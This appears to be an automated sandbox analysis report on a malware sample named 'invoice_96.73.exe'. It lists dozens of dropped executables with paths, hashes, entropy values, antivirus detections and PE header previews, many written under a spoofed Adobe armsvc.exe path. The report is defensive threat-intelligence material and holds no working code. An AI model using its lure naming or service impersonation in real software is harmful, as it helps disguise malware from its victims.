                                                                                                                                                                Size (bytes):1829964
                                                                                                                                                                Entropy (8bit):7.265211258010209
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:FaKJTypekiPKQTvOTaTfjBxr8RWgFIDRRAubt5M:dGpeBPBDXkUf
                                                                                                                                                                MD5:865DCBC6AA37DD1B7BFF0A0F37B76755
                                                                                                                                                                SHA1:2672CD747FAEDD7D1E58770F52F1E2A04B1B3136
                                                                                                                                                                SHA-256:B4217DBBCCB010FAC1E73EF0CE11B9C37627F6C734E1EE0A0E0EB8019A10DF13
                                                                                                                                                                SHA-512:A7198BE8D56208D5C54774CBD7E3B6EB42A1B52574311CB381AF5C21EC081EA0F24CE84875FF97235F88F0AFD4D0B55507DC139CC1EADA3642E1FA9A0A9EB8B5
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.._].._].._]..R. ..]..R....]..R.!.L\..V%B.\]..V%R.F].._]...\....$.=]......^]..R...^].._]V.^]......^]..Rich_]..........................PE..L......U.....................j....................@...........................%.....................................................................................................................0...@............................................text............................... ..`.rdata..............................@..@.data...<...........................@....rsrc................J..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1658880
                                                                                                                                                                Entropy (8bit):4.312984783745722
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:lxGBcTlkVg9N9JMlDlfjRiVuVsWt5MJMs:LGyhkgFIDRRAubt5M
                                                                                                                                                                MD5:38BDB885A492FB07195A5DF3F45BA0BB
                                                                                                                                                                SHA1:C520EDE3BED4D97507530ECE268D619A22C41979
                                                                                                                                                                SHA-256:3101297E117D91C618EFA880714D5963CE4EDAFEAE5A3252F1154E72A12877E0
                                                                                                                                                                SHA-512:6BBB100B03308CC0FB0F2638592F2080837AF741B8DEDB7705EA2B06FA67D038DC9D2FFB8B943BDFB8DEBC3E0C2D9C9828DB48637EE49084685A5933874F293F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...V.+d..........................................@..................................l......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2294272
Entropy (8bit):7.039446570157768
Encrypted:false
SSDEEP:49152:u3wR2xs4r4VMm9qRzzFbju+Gb2PJsWT12ngFIDRRAubt5M:t24dqRzgOJ2gUf
MD5:81F69B7ADB54A4B19582226700CDDA63
SHA1:79DEB0372C368D50A3498837E0C5674B21708041
SHA-256:96F391751ACCE5B40792E088A8221C0333463286672B7B70B88F6AB47E72F40B
SHA-512:06085437BF1793DCB553461E11AEF32645A4A44C923F8660C6ADE5D40F0DBBEBBD079D7A8384D4181C5D4CBDC81835CF28591A6A273A3A731A4D5B97AF959DD8
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2257
Entropy (8bit):4.574646680658393
Encrypted:false
SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
MD5:F39DBD2946034C065D2E560FE4ED6BAC
SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
Malicious:false
Preview:Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...Disabled unneeded token privilege: SeAuditPrivilege...Disabled unneeded token privilege: SeBackupPrivilege...Disabled unneeded token privilege: SeCreateGlobalPrivilege...Disabled unneeded token privilege: SeCreatePagefilePrivilege...Disabled unneeded token privilege: SeCreatePermanentPrivilege...Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..Disabled unneeded token privilege: SeDebugPrivilege...Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..Disabled unneeded token privilege: SeImpersonatePrivilege...Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege...Disabled unneeded token privilege: SeIncreaseQuotaPrivilege...Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege...Disabled unneeded token privilege: SeLoadDriverPrivilege...Disabled unneeded token privilege: SeLockMemory
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1661952
Entropy (8bit):4.349536196253639
Encrypted:false
SSDEEP:24576:pwLZrVqVg9N9JMlDlfjRiVuVsWt5MJMs:C9rIgFIDRRAubt5M
MD5:CC9BE47A84D7EB73D78181F087D654DC
SHA1:6075C247BF5C764A7F82B717F224866B828DF6DB
SHA-256:87E6CFD6BD4BC73BA9E686DB6E43AF6AEA4CDC7C6340828360B61ECB445EDD63
SHA-512:BE9BE38E7272AA51E7D012B1500C003104506C2D8E0672165C48091050CC7D82A8CFFA18E23FDED34514C529738757C93D1ED275D589D2E5991BC9B9BC847C28
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):7916544
Entropy (8bit):6.808800946972303
Encrypted:false
SSDEEP:98304:o4XzU6N8DGpG+HIIbaATLQOzgA2YcwTPujzFPGctXLcMpiYUf:vWmG+onAtkJYrTG3x9rUf
MD5:ADFFCA97437F33E304EDA77C317E5AB5
SHA1:B5BB54BE8E9B3DFC99AEA73FD1867C6BB0BB29F7
SHA-256:EF226CFB32CB970022BE8906DBA10AB5AC88C2A89B7C20509954E5F9BD3E7641
SHA-512:43E71C5A6321805196180E09D4F464E0F227CB5E743E30CDA20E386B4EF14E85B1053B2744D75A69E80F730CA8F81ECB9CA754BB87FC686903E50F1D2BAC0C06
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):9932288
Entropy (8bit):6.573768136064191
Encrypted:false
SSDEEP:98304:x8KDFDVEj6anCFaSnouaILckYPujzFPGctXLcMMUf:x7DVy6TaSnokIkYG3x9kUf
MD5:91AA31DB7CC4AB3BB8D7ACABA6FF8B3B
SHA1:B7DE59619FDFF119F0B276C4711F64A1C1245CBE
SHA-256:CACFD2EF0A7AF7DAE8E7E1A7EA05E4560C5852E501B5C6B39BDBAADCB88EC361
SHA-512:870DD6B0E9D2DE4B88843DCADCBDABE94B88BAEA71BEF348970080191C9E069D50D6692F3D5468A7B59A79C2C2876B472F924BA9F761914D682774D9EB1121FC
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1666048
Entropy (8bit):4.323754583224004
Encrypted:false
SSDEEP:12288:1jrNF/ZXGtFBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:1FGX7Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:C92655B3FDD91A5FD88170CF4442DBF9
SHA1:261AA4A4558256AB49546498A4D1117BAE2B66AF
SHA-256:F57A2BDB30EEC7212D9D0B953D1DEF3849C404F89231A6953AF1FBF3920515CA
SHA-512:F546C5A9A8CC6877EBDC4C3DCDDEAC13E15B8BF124B78851A9ACABEA23C008B95B558B172F5C5E098F8D27767A1639F57C37A09E8034C57CD35DB357BADCD3C2
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1526784
Entropy (8bit):4.025018462466428
Encrypted:false
SSDEEP:12288:MvV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:iVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:FE585477CBB9E34A740E545F66A4F0A5
SHA1:88BFCB7ADE3E8CCE2A1DA0BB9090EDEA57FB160F
SHA-256:6449D7370713A74A0CE27A12EFD7C7F3B81DC553B24EEAE8F47194A05FBB0122
SHA-512:0029CC628B24227430EA67446DBEA0D90DB580CB1CE09E9641FFBC2E859BFAC7323E8500A3512B3194E097CD8FB5A37252E6D63D755ED58C3DED873E21F9BA63
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508352
Entropy (8bit):4.000673470590711
Encrypted:false
SSDEEP:12288:S1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S3Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:40BC613D8E346E2EDABBCE76676211BD
SHA1:98D53C9B5B6FCEC98202D3D48D2A2A4A8E37AF89
SHA-256:4EF3C29A688FAC360436FE2A35B44A9A685D8B93003016437E00DBE4A6E9941E
SHA-512:E8399F116E559CDE3215568441EDA00072A1C663278D632F421D6E932D3100FDB15CCFBF0D89CF435316E22A8443B06B2799D9B3689ED7732B1ACB0074312267
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1698304
Entropy (8bit):4.4015136125452985
Encrypted:false
SSDEEP:24576:VSTPHT1DIVg9N9JMlDlfjRiVuVsWt5MJMs:VST/TugFIDRRAubt5M
MD5:F939C3E0236CD9F43A7CB1D2392C4840
SHA1:83EC834FAC5DFBF3459972DF8F98A1488E59E192
SHA-256:8BECF4E10EECDA77A40C7983CE84CD28216612CFA1DCBA2787FC2A29E39702DA
SHA-512:144626AB280AF55011C7979CAE7BB941D13C0B1A08500B9B3C02C0EB359617F20F94B1B1A70E27AFB4147133DFE49291CD3448D67273058D1D55CBB9DFD2EF57
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#.q.p.q.p.q.p<?"p.q.p...p.q.p..$p.q.p..)p.q.p.q.p.q.p...p.q.p.. p.q.p..'p.q.pRich.q.p........................PE..d...~]OX.........."..........B.................@.............................P...............................................................]..d...............H.......................................................................X............................text...A........................... ..`.rdata..............................@..@.data....?...p.......X..............@....pdata..H............t..............@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1572352
Entropy (8bit):4.123695335889213
Encrypted:false
SSDEEP:12288:93Kan/lPv0V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:9xIVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:D2E1B6C2EF2481029B91BEE01A0CD5D3
SHA1:068069D1414CE0534892A1E9AC57EB1E6942135E
SHA-256:2BB6A3B224A64945336B8438A30F0296C83803722413B420A5B65E960DFF7C82
SHA-512:7D2A7CF1F07CB549A4233B4C18CD11DC58CCF70FE4F39A1A02AD2891A1B1B1630E530518FCE75300A005720C0FFC54003CDB93BF107C3C05BBC8FFFDFE8E7A8B
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$#..`B..`B..`B..{.f.bB....b.aB..{.d.bB..{.P.sB..i:i.iB..`B...B...4Q.hB..{.Q.gB..{.`.aB..{.g.aB..Rich`B..........PE..d....`OX.........."......Z..........tW.........@.............................P......V|..........................................................x....................................s...............................................p...............................text....X.......Z.................. ..`.rdata...5...p...6...^..............@..@.data...x...........................@....pdata..............................@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1698304
Entropy (8bit):4.402152910472849
Encrypted:false
SSDEEP:24576:9Hj8YsTuDDVg9N9JMlDlfjRiVuVsWt5MJMs:9HjnsTqgFIDRRAubt5M
MD5:38C3EA7CA99603488FF1135A3AD5A322
SHA1:E096D791DA71FB02AACB69020F57BEAA15911C9E
SHA-256:A8759062DB121B8A01412A459092815215E9237B71F4EADC57E02D038DA8E171
SHA-512:D2A853FACE32BF1E3EFBAE4A2FD00DC35DE1250960E8E58B2F656AEBCA42254B0495FB4EFE754A5CF5459D6F5B87214ED3A9AD27E18D4248530D38743D6AFB6D
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o."..eq..eq..eqY@.q..eq..q..eq..q..eq.v.q..eq..dq..eq..qk.eq..q..eq..q..eqRich..eq........PE..d...~]OX.........."..........B.................@.............................P.......r.......................................................]..d...............T.......................................................................X............................text............................... ..`.rdata..............................@..@.data....?...p.......X..............@....pdata..T............t..............@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1808384
Entropy (8bit):4.520083463391029
Encrypted:false
SSDEEP:24576:nRjdh53Kv0Vg9N9JMlDlfjRiVuVsWt5MJMs:RjdJgFIDRRAubt5M
MD5:285E161404B75971AFD7D6F25DABC055
SHA1:790AB56A1F2335D54CA4DBF748689A2653481FB1
SHA-256:919B17F5C7E011EBFDBFA91BD701E46CA790A5DB3D82E6AF009099209E48C361
SHA-512:A2D254519BCD2D132A014997B66F335EAF735FE273331EDF0ACB9B5F04F2A0A4AB2514AF8D9B4642DEE55843FA437946792A876C1B4F2D29ADA14BB1F7215827
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q.............6A.......t.......L..............6u.D....6t......6E......6B.....Rich....................PE..d...d_OX.........."..........L.................@.............................`......_..........................................................x...............| ..................`....................................................... ........................text...>........................... ..`.rdata.............................@..@.data...h...........................@....pdata..| ......."..................@..@.rsrc................6..............@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508352
Entropy (8bit):4.0011061130382135
Encrypted:false
SSDEEP:12288:oBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:o7Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:B47E8DD138D3F9F963BF9D8D3C02ED65
SHA1:110FF59A9857A4D98E14FF48F59EA9EAEF05C5E9
SHA-256:1A957A8ABA5780DCFF7B13C64CC2AFBA44CBB2D6253C2E443BD7A117E1DAAD79
SHA-512:33031C4748F46E2437BE606E9ADBC72335C31B5EF19751E65DDE27CF3B97AF33369DA2B6DF6CF1DA8419A540E5472B114382D2C4B55CEEAE4F7E93467BB1F3FC
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......>........................................................#..P....P..@....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...@....P......................@..@.reloc.......`.......$..............@...........................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1603584
Entropy (8bit):4.197235556558599
Encrypted:false
SSDEEP:12288:433JWHkdceKV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:kVdceyVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:178FF05867F6E6FCC71739F5D8DDB4A4
SHA1:1EFD0B97055B6CD9C1AF6400A09CA39C78C2AF3E
SHA-256:FE490E13F733B8E0D641517F85D30B391D237D22784D07CA4CD18852027A8E86
SHA-512:4D29B5F11BCE2033D6150A26A89E8A8D46009DB85DCD2468206EE94C4C916B6BA7F4FC7EE9E20D6623379BBFE5BC34B7FA86083F1C379B3C85E91ADC0DFDF0FE
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IJ..($..($..($..P...($....($.df...($....($..(%.N($.^...($....($....($....($....($.Rich.($.........PE..d...._OX..........".................|..........@.....................................n...................................................... k..x.......H.......`...................P........................................................f.......................text...~........................... ..`.rdata..rj.......l..................@..@.data....6...........j..............@....pdata..`...........................@..@.rsrc...H...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.00001643378742
Encrypted:false
SSDEEP:12288:CvV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:CdVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:E96F4F693FACFDF5FA9812C3D43D94FD
SHA1:DE3A1DF108F45018454E02BDAE24257CADE22576
SHA-256:7BB182BCB86614B32E6CB5F9B075821925F688A8BC70EF025FD2CE7BB2608FCA
SHA-512:86B0C13BEBA84E2697D45FDC8AC9EBBA21EBE165E47D5AC33FE3A091A3177C2067CC0259DC8365B449B007F925C02A33254640ACD29FE043DC0D0A6E6094067F
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......<........................................................#..P....P..T....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...T....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.000052478632848
Encrypted:false
SSDEEP:12288:2fV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2tVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:3B0B1EAE4B6A689CA6A3FB65853C6AE7
SHA1:60FE0BBC3315A09C8CB8F7353A413EFB25B8DB0A
SHA-256:0ABF8240EC4EA32A16111DAC0203F1712F13238A9D7F2E39C0339C3B40C24227
SHA-512:6856D50E3097B70FE4C3DED851177D3C37345A50654C9B62635E7EA2E7F29183F8373FE2BDC53ABAF8203523968755F119E8E73C13F5946C05657787F57A9CF9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P.......j.......................................................#..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000050858099175
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:DfV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:DtVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:018DBF2D48356A891846B379DA1FF300
                                                                                                                                                                SHA1:15DDCD526EDA778E43C2F80BE4C203C5F15269CA
                                                                                                                                                                SHA-256:6D9D5475B755390303D6C459FDB597E7096BD32BF2A6B5809DD011329F524310
                                                                                                                                                                SHA-512:2F4EA075829427B070EB1F338425215576421AA2F5CE2AFB952FA6EB4E663A652FAB53606252088982C5E60EC9A835D7A1E19FC26AA563AB495EE402DC8A369D
                                                                                                                                                                Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.000023603797839
Encrypted:false
SSDEEP:12288:uHV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ulVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:4D15FA041DA708FF517EC80F157A2E85
SHA1:09B20D5DAD77850D51F5C47538247FEE976D066B
SHA-256:A71208D2C63EC3C17A7CB3FECCE4A2343824B9BE5E20518E7CCCCCAD3153A9A7
SHA-512:60905DA27171110A4C804A24C37B17F6B55A10B9B806C2144083B71069F2FA1CF3193A01B7C89058964718F291FF8E1207D5E2752FA99ECF4D32BDADC23E2B3C
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.000773445203762
Encrypted:false
SSDEEP:12288:/rV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:/hVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:111E42C322F70E37F9648044645EAF90
SHA1:4CA22DEF9BC471B75B05866E2158E10623FD01AE
SHA-256:711EB94A7B229DF0334B39D52E19F171D2A6CC08EE735311FDF4A132C6C5F36E
SHA-512:4C6C74CAF007A4F7BBB0BC5B576FB6F3592081E2F0F13BE1BA36D484B3E30523082217C4F4216AEC39501BAF5A3684729FB5E8B60747D8E22E51E17EB9FEB156
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.0000329836634085
Encrypted:false
SSDEEP:12288:8vV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:8dVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:257E8C6C9044A556EDB9B92C12909FCD
SHA1:278C1DBF3B9551DD062045BC22A18BA2E36E062F
SHA-256:62039FA872517DEC519E4697F414A7159788D8E5C2D7A57B751B0468068ABEEB
SHA-512:37742278F9D28BA4F851EB1C31BE4B5FD45C911E62818EACC2B6399DE21F36C8911D2FE2AC532D068B61CAA589237A9E8BCCF1BA411C25AAD9B86D0EA0BEFF06
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.00004724552698
Encrypted:false
SSDEEP:12288:IqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ISVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:C9AAC268754DE57EA08798FAC2297BE7
SHA1:93A63446E46DF119B3618688BFB68E0F860044F1
SHA-256:1F7239D7A6EA18CEA4992AE251B4F9B43264488A8001EE7C5B9DBE86C5D62C58
SHA-512:27BD8A83E9C9B69D0736EEEF89C9D799307CD0791FA9C379781E3196BCF64EF960AA23DAB8E4EA154803B355AB1C1CEB83224B6A9AF36574A4F5C7E08D0259B4
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508352
Entropy (8bit):4.001092108156764
Encrypted:false
SSDEEP:12288:QHV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:QlVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:2D8C088D3673B20DDEBF39F47F622A22
SHA1:21C080104DBF3342FEAA145CCBA0C16AF4D3D098
SHA-256:B5F88E8384028981E23791325D9E56872714FC650A7CF6CDA9E4FE9ED6C7A34E
SHA-512:A1B5C919201521D13E17F0B1DAE075FC9748BE77B9D495BABC65BB27CA0E0F9D998FB2A9791A883CA6A7069179BF19D0CA87B6009371C14B4DD68EA61D1EA441
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.000009323291101
Encrypted:false
SSDEEP:12288:FgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:FMVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:68F7F3C48FC17A20044C1A44635AA0B0
SHA1:9BF2B27BCD599DDD1B20F27A5353BE31D1054FB7
SHA-256:9EA19363B0196461F720A43E1DD9249B56F16DB354A845E8365E150AB4DE73D9
SHA-512:83D3BF8F9E05E9C6450D2D3567FF829873DB9C7CD714B04770118661708038329142998A33B5DAEDE655A5A2C11C2E50039479386E92D3D508259260B1965C3F
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.00005638138536
Encrypted:false
SSDEEP:12288:KqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:KSVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:9B6E680FCAF60ECB3EEBF0981627E5AB
SHA1:C121B9057BDB5DE2FB7EF07A3CC6A829E4E4EEC7
SHA-256:6FB9FCA9C0BB0765D2CC6A03795DE2CFF5E1DBB37D87AE72939A4515DC8C99BC
SHA-512:139996E1DDE923B27A84CAB09774D2298E5706442C33EE339785FCB65C41F1F514078AD26FA3DFEDE52D94883C9181084311CD0DEB1FC578F89E02921450E3D4
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1562112
Entropy (8bit):4.097513477371846
Encrypted:false
SSDEEP:12288:0ZddtaNtuOOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:IOuVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:5F6AF0D40D0AB7B0DCF88673911B2B7B
SHA1:004B12046056D8CDFBAD13B6B4CFD537777BF86A
SHA-256:5B8692741EB4F72092C7A155272C9426DBF0AC71CDCDD2D11DC94661454570F2
SHA-512:44831A90B922CFA76F814C50B553611732B5B5F41684854E953EC68399D4136D2B9D6D405B3700A668BED70D1C3CBEACAD74A11EC15212A321D53EF5702FC16F
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1508864
Entropy (8bit):4.000963489792153
Encrypted:false
SSDEEP:12288:pJV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:pzVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:986640509FB9F57FDEAD127043EED6A6
SHA1:76E197A6EEC089CED5A6EBCC4E84A295574ABF04
SHA-256:85F67E4C6E39DBA3D8193F30A933C8FEB82F03B75BEA3C7E884EF8905562398D
SHA-512:859601C4E836D9CF2ACB344E2F2A96963D7C39C33C0E20C940A6DF0B7EA94F972976C6D9A61B003A0D05D433665A70A2A54602C03A9DD7617DDE77F3880EB5B6
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1688576
Entropy (8bit):4.318424550665476
Encrypted:false
SSDEEP:24576:TKQuT+wNTwGVg9N9JMlDlfjRiVuVsWt5MJMs:WfTJNTwCgFIDRRAubt5M
MD5:C79C5866767E12CFF86450CF47A1F8CB
SHA1:3F6A85774024474CC9DFE85E948A822EA4EEB1E5
SHA-256:685EE9B94B99B2E653891EBFEB8ED7A5735971491D1440D350B7DD523056A33F
SHA-512:D43C172BD65B8ED36313DA4B8BA50F70701C661C2E9BC42CD8A5472A2DDBA9923A028C145DD324FAAB7987490B2667D94BD32F1B7DC1C06A791255183C7B7ED5
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):2106368
Entropy (8bit):6.889853511062774
Encrypted:false
SSDEEP:24576:Cj9F3pnjgGHVVPZRR+riYiPe2QrUuxDnhHu8BsmVg9N9JMlDlfjRiVuVsWt5MJMs:uMgVRWpdnrUuxDhO8HgFIDRRAubt5M
MD5:10E89C8F206314FB02048F2CE4C83BFB
